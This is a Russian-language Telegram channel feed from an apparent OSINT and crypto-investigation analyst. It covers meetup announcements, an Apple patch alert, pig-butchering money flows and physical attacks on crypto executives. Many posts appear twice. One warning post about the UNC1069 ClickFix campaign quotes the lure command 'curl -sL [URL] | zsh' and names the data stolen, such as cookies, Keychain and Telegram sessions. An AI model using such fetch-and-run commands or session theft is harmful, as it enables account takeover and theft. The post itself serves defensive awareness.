Спасибо всем, кто пришёл на встречу 2600 и сделал этот вечер таким, каким он получился 🙌
Да, в начале были небольшие технические недочёты - микрофон решил пожить своей жизнью, - но дальше всё пошло как надо. По вашим отзывам, атмосфера, доклад и живое обсуждение действительно зашли, а это самое главное.
Отдельное спасибо за вопросы, комментарии и разговоры после выступления - именно ради такого формата и существует 2600. Очень ценно видеть интерес, критику и разные точки зрения.
Надеюсь, всем понравилось и каждый унес с собой что-то полезное. Если есть мысли, идеи или фидбек - смело пишите в лс, буду рад обратной связи 💬
Да, в начале были небольшие технические недочёты - микрофон решил пожить своей жизнью, - но дальше всё пошло как надо. По вашим отзывам, атмосфера, доклад и живое обсуждение действительно зашли, а это самое главное.
Отдельное спасибо за вопросы, комментарии и разговоры после выступления - именно ради такого формата и существует 2600. Очень ценно видеть интерес, критику и разные точки зрения.
Надеюсь, всем понравилось и каждый унес с собой что-то полезное. Если есть мысли, идеи или фидбек - смело пишите в лс, буду рад обратной связи 💬
🔥8❤4🤩3👍2
Forwarded from Хакер — Xakep.RU
Встреча читателей «Хакера» пройдет в Алматы 29 января
29 января 2026 года в 19:00 состоится встреча читателей «Хакера» в Алматы, приуроченная к разблокировке Xakep.ru на территории Казахстана. На офлайн встрече выступит главный редактор «Хакера», а также двое спикеров из хакерспейса Black Ice.
https://xakep.ru/2026/01/21/almaty-meetup-jan/
29 января 2026 года в 19:00 состоится встреча читателей «Хакера» в Алматы, приуроченная к разблокировке Xakep.ru на территории Казахстана. На офлайн встрече выступит главный редактор «Хакера», а также двое спикеров из хакерспейса Black Ice.
https://xakep.ru/2026/01/21/almaty-meetup-jan/
🔥8
Всем привет 👋
Я один из докладчиков на этой встрече.
Если вы не попали на мой доклад на 2600 - это хороший шанс наверстать и пообщаться вживую
Я один из докладчиков на этой встрече.
Если вы не попали на мой доклад на 2600 - это хороший шанс наверстать и пообщаться вживую
👍7❤4🌚1
Скорее всего по своему докладу напишу статью, так как главный редактор хакера сказал, что тема крутая)
🔥7🏆3
Forwarded from Чёрный Лёд
Вторым докладчиком на встрече выступит Celestial — OSINT analyst и CTI analyst.
Доклад:
“Кроссчейн-мосты между приватностью и атрибуцией: системный анализ криминального использования”.
Коротко о содержании:
• как работают кроссчейн-мосты и где они выдают следы;
• популярные маршруты типа Tron → BTTC → Polygon → CEX;
• типовые ошибки атакующих и реальные кейсы 2025 года.
📅 Когда: 29.01.2026
🕖 Время: 19:00
📍 Где: г. Алматы, Energo University
Доклад:
“Кроссчейн-мосты между приватностью и атрибуцией: системный анализ криминального использования”.
Коротко о содержании:
• как работают кроссчейн-мосты и где они выдают следы;
• популярные маршруты типа Tron → BTTC → Polygon → CEX;
• типовые ошибки атакующих и реальные кейсы 2025 года.
📅 Когда: 29.01.2026
🕖 Время: 19:00
📍 Где: г. Алматы, Energo University
🔥5🍾3❤2❤🔥1💋1
Всем спасибо за то, что пришли. Было круто
Надеюсь, что доклад побудил вас вникнуть в тему криптовалютных расследований)
Надеюсь, что доклад побудил вас вникнуть в тему криптовалютных расследований)
👏9🔥7❤4🌭1
Набираю 6 студентов на OSINT-практику
Летом хочу собрать небольшую команду студентов, которые хотят нормально попробовать себя в аналитике и OSINT
Будем заниматься:
— сбором и анализом данных
— исследованием платформ
— построением графов связей
— подготовкой аналитических материалов
— участием в разработке OSINT-инструмента
Если вам это интересно, напишите в личные:
ФИО, вуз/курс и пару слов о себе (что уже пробовали делать или чему хотите научиться).
Возьму небольшую группу - до 6 человек, чтобы можно было нормально поработать с каждым
Летом хочу собрать небольшую команду студентов, которые хотят нормально попробовать себя в аналитике и OSINT
Будем заниматься:
— сбором и анализом данных
— исследованием платформ
— построением графов связей
— подготовкой аналитических материалов
— участием в разработке OSINT-инструмента
Если вам это интересно, напишите в личные:
ФИО, вуз/курс и пару слов о себе (что уже пробовали делать или чему хотите научиться).
Возьму небольшую группу - до 6 человек, чтобы можно было нормально поработать с каждым
🔥8❤🔥4❤1🤔1
🚨 Apple закрыли 0-day. Уже использовался в атаках.
CVE-2026-20700
Если у вас Mac / iPhone / iPad - нужно просто зайти и обновиться.
Пофикшено в:
• macOS Tahoe 26.3
• iOS 26.3
• iPadOS 26.3
• visionOS 26.3
• watchOS 26.3
• tvOS 26.3
Просой OPSEC:
1) Проверить свою версию
2) Установить обновление
3) Напомнить близким сделать то же самое)
Решил тут немного еще про Apple постить, так как в свое время мечтал у них работать)
CVE-2026-20700
Если у вас Mac / iPhone / iPad - нужно просто зайти и обновиться.
Пофикшено в:
• macOS Tahoe 26.3
• iOS 26.3
• iPadOS 26.3
• visionOS 26.3
• watchOS 26.3
• tvOS 26.3
Просой OPSEC:
1) Проверить свою версию
2) Установить обновление
3) Напомнить близким сделать то же самое)
Решил тут немного еще про Apple постить, так как в свое время мечтал у них работать)
❤9👀3❤🔥2
UNC1069: Deepfake-театр и терминальные эксплойты
Группировка перешла от стандартного фишинга к использованию AI-аватаров реальных CEO прямо на созвонах. Вы заходите на встречу (домен типа zoom-meeting[.]us), видите известного фаундера, слышите его голос, но видео «лагает» из-за якобы плохого соединения.
Вся схема заточена под вектор ClickFix.
Вместо того чтобы кидать подозрительный файл, вас просят «починить», вставив скрипт в терминал. Расчет на психологию: скопировать код кажется безопаснее, чем скачать exe-шник.
Исполнение моментальное. На macOS это классический curl -sL [URL] | zsh, на Windows прилетает mshta.
После ввода команды они не ищут сид-фразы. Они пылесосят активные сессии (Cookies). Это дает прямой вход на биржи (CEX), в админки и SaaS в обход 2FA. Заодно вытягивают Keychain и сессии Telegram (tdata), чтобы масштабировать атаку уже от вашего имени.
Кампания эксплуатирует старый миф о том, что macOS безопасна «из коробки». Если кто-то просит вставить команду в терминал, чтобы пофиксить микрофон - рубите связь. Даже если на экране ваш друг.
Более подробно об этой APT можно прочитать здесь:
https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering
Группировка перешла от стандартного фишинга к использованию AI-аватаров реальных CEO прямо на созвонах. Вы заходите на встречу (домен типа zoom-meeting[.]us), видите известного фаундера, слышите его голос, но видео «лагает» из-за якобы плохого соединения.
Вся схема заточена под вектор ClickFix.
Вместо того чтобы кидать подозрительный файл, вас просят «починить», вставив скрипт в терминал. Расчет на психологию: скопировать код кажется безопаснее, чем скачать exe-шник.
Исполнение моментальное. На macOS это классический curl -sL [URL] | zsh, на Windows прилетает mshta.
После ввода команды они не ищут сид-фразы. Они пылесосят активные сессии (Cookies). Это дает прямой вход на биржи (CEX), в админки и SaaS в обход 2FA. Заодно вытягивают Keychain и сессии Telegram (tdata), чтобы масштабировать атаку уже от вашего имени.
Кампания эксплуатирует старый миф о том, что macOS безопасна «из коробки». Если кто-то просит вставить команду в терминал, чтобы пофиксить микрофон - рубите связь. Даже если на экране ваш друг.
Более подробно об этой APT можно прочитать здесь:
https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering
Google Cloud Blog
UNC1069 Targets Cryptocurrency Sector with New Tooling and AI-Enabled Social Engineering | Google Cloud Blog
North Korean threat actors target the cryptocurrency industry using AI-enabled social engineering such as deepfakes, and ClickFix.
❤5🤯2
Речь про тот самый кейс, где DOJ изъяли 127 тысяч BTC, связанные с pig butchering схемами. Огромные суммы, десятки тысяч транзакций и целая сеть компаний вокруг. Но самое интересное не в цифрах, а в том, как это всё было устроено.
DOJ по сути разобрали не просто набор кошельков, а теневую финансовую систему. Когда смотришь на структуру Prince Group, это больше похоже на банковскую инфраструктуру, чем на скам-кошелёк. Mining-операции работали как отмывка ликвидности, Huione OTC были рельсами для движения средств, а Prince Bank выступал как точка выхода в фиат.
Pig butchering давно уже не «скам из телеги». Это индустрия. С траффикингом людей, колл-центрами, CRM, KPI и нормальной финансовой логистикой через ончейн. Деньги дробятся, гоняются по адресам, проходят через прокладки.
Я сел писать об этом после статьи Elliptic “Park: Prince and Huione’s role in a scam compound still operating amid crackdowns”. Она хорошо показывает, как такие структуры продолжают работать даже на фоне давления и арестов.
И на фоне этих миллиардов особенно тяжело смотреть недавнее интервью в Казахстане. Парень просто искал хорошо оплачиваемую работу и в итоге оказался в трудовом рабстве в Мьянме в составе scam compound. За всеми этими графами и миллиардами всегда стоят реальные люди.
DOJ по сути разобрали не просто набор кошельков, а теневую финансовую систему. Когда смотришь на структуру Prince Group, это больше похоже на банковскую инфраструктуру, чем на скам-кошелёк. Mining-операции работали как отмывка ликвидности, Huione OTC были рельсами для движения средств, а Prince Bank выступал как точка выхода в фиат.
Pig butchering давно уже не «скам из телеги». Это индустрия. С траффикингом людей, колл-центрами, CRM, KPI и нормальной финансовой логистикой через ончейн. Деньги дробятся, гоняются по адресам, проходят через прокладки.
Я сел писать об этом после статьи Elliptic “Park: Prince and Huione’s role in a scam compound still operating amid crackdowns”. Она хорошо показывает, как такие структуры продолжают работать даже на фоне давления и арестов.
И на фоне этих миллиардов особенно тяжело смотреть недавнее интервью в Казахстане. Парень просто искал хорошо оплачиваемую работу и в итоге оказался в трудовом рабстве в Мьянме в составе scam compound. За всеми этими графами и миллиардами всегда стоят реальные люди.
X (formerly Twitter)
Arkham (@arkham) on X
BREAKING: US Government Seized $14B BTC Tied to LuBian and Chen Zhi’s Pig Butchering Operation
The US Government has submitted today a filing for the forfeiture of 127,271 $BTC ($14.2 BILLION) connected to Chen Zhi, chairman of Prince Group, who allegedly…
The US Government has submitted today a filing for the forfeiture of 127,271 $BTC ($14.2 BILLION) connected to Chen Zhi, chairman of Prince Group, who allegedly…
❤5🔥2
Если всё это собрать в граф - получается вот такая картина.
И это ещё без мелких связей.
Кошельки уже кластеризированы - то есть объединены там, где есть признаки общего контроля.
И если честно, то масштаб э поражает.
Поэтому я впечатлён объёмом проделанной работы DOJ.
Я помню свой первый ончейн-трейсинг: тогда каждая транзакция казалась лабиринтом. Понять логику движения средств, увидеть связи, не утонуть в деталях - это было крайне сложно.
А когда смотришь на такие расследования, кажется, будто это всего лишь линии и точки на графе)
И это ещё без мелких связей.
Кошельки уже кластеризированы - то есть объединены там, где есть признаки общего контроля.
И если честно, то масштаб э поражает.
Поэтому я впечатлён объёмом проделанной работы DOJ.
Я помню свой первый ончейн-трейсинг: тогда каждая транзакция казалась лабиринтом. Понять логику движения средств, увидеть связи, не утонуть в деталях - это было крайне сложно.
А когда смотришь на такие расследования, кажется, будто это всего лишь линии и точки на графе)
❤8
Ладно, если не говорить о прошлом, а о нынешних трендах, то во Франции сейчас происходит что-то очень неприятное.
CEO Binance France Давид Пренсэ стал целью вчерашнего нападения. Около семи утра трое в масках ворвались в жилой дом, сначала ошиблись квартирой - искали именно его. Когда добрались до нужной двери, его и семьи дома не оказалось. Забрали два телефона и скрылись. Он и близкие не пострадали. Но сам факт показательный.
И это не единичный случай.
В январе 2025-го похитили Давида Баллана, сооснователя Ledger. Из собственного дома во Франции. Требовали €10 млн в крипте. Чтобы ускорить выплату, ему отрезали палец. История закончилась спасением после частичного перевода выкупа, но сам сигнал был максимально жёсткий.
Во Франции сейчас реально пиздец творится вокруг крипто-индустрии.
Это wrench attack в чистом виде когда вместо эксплойта используют физическое насилие.
Мы много говорим про OPSEC, про cold storage, про multisig, про разделение ролей, про air-gapped устройства. Но вся эта архитектура ломается, когда к тебе приходят домой. И это новая реальность для публичных фигур в крипте
CEO Binance France Давид Пренсэ стал целью вчерашнего нападения. Около семи утра трое в масках ворвались в жилой дом, сначала ошиблись квартирой - искали именно его. Когда добрались до нужной двери, его и семьи дома не оказалось. Забрали два телефона и скрылись. Он и близкие не пострадали. Но сам факт показательный.
И это не единичный случай.
В январе 2025-го похитили Давида Баллана, сооснователя Ledger. Из собственного дома во Франции. Требовали €10 млн в крипте. Чтобы ускорить выплату, ему отрезали палец. История закончилась спасением после частичного перевода выкупа, но сам сигнал был максимально жёсткий.
Во Франции сейчас реально пиздец творится вокруг крипто-индустрии.
Это wrench attack в чистом виде когда вместо эксплойта используют физическое насилие.
Мы много говорим про OPSEC, про cold storage, про multisig, про разделение ролей, про air-gapped устройства. Но вся эта архитектура ломается, когда к тебе приходят домой. И это новая реальность для публичных фигур в крипте
❤6😈2
Forwarded from ZeroNights
В 2026 году встретимся на конференции по практической безопасности в Санкт-Петербурге в пространстве LOFT #7.
Надеемся на теплую осень и готовим насыщенную программу:
В скором времени мы запустим CFP, а пока предлагаем вам рассмотреть возможность стать коммерческими партнерами конференции. Отправить заявку можно через форму на главной странице сайта.
Или напишите нам на почту: partner@zeronights.ru
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6
Forwarded from OSINT mindset
გამარჯობა საქართველო! Приближается OSINT mindset meetup geo #1 и мы готовы представить наших спикеров!
Soxoj — Введение в OSINT
Константин Яковлев — Фактчекинг на полную катушку: опыт (очень) большой редакции
CuriV — Техническая разведка глазами пентестера
Ждём всех 28 февраля, в 14:00 (UTC+4), по адресу г. Тбилиси, ул. Мераба Алексидзе, 1, в Sandbox Hackerspace. Мероприятие полностью бесплатное, без регистрации и возрастного ограничения✨
🌐 Site | 💬 Forum | 🔍 Family |▶ YT
Soxoj — Введение в OSINT
Константин Яковлев — Фактчекинг на полную катушку: опыт (очень) большой редакции
CuriV — Техническая разведка глазами пентестера
Ждём всех 28 февраля, в 14:00 (UTC+4), по адресу г. Тбилиси, ул. Мераба Алексидзе, 1, в Sandbox Hackerspace. Мероприятие полностью бесплатное, без регистрации и возрастного ограничения
Please open Telegram to view this post
VIEW IN TELEGRAM